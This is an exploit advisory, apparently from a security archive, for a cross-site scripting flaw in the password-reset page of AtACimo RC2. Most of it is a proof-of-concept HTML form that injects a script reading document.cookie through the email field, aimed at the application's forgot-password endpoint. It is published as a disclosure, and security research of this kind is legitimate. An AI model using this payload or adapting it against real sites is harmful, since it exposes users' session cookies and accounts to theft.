AtACimo release candidate 2 suffers from a cross site scripting vulnerability.
9e0d4b0f825ff97e709506dd7e253dfbd37e93941c1e3b5aa8b90ea088487271
# Exploit Title: [AtACimo RC2 (index.php) XSS Vulnerability]
# Date: [2010-02-25]
# Author: [sniper ip]
# Software Link: [https://atacimo.com/media/download_gallery/AtACimo%20RC2.zip]
# Version: [AtACimo RC2]
# Tested on: [no]
# CVE : [no]
# Code :
https://127.0.0.1/AtACimo/admin/login/forgot/index.php
<html>
<!--! By sniper ip & Mr.Sohayl !-->
<form name="forgot_pass" action="https://127.0.0.1/AtACimo/admin/login/forgot/index.php" method="post">
<input type="text" maxlength="255" name="email" value=""><script>alert(document.cookie);</script>" style="width: 315;height:22" size="1" />
<input class="button" type="submit" name="submit" value="Send Details" >
</html>
</form>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed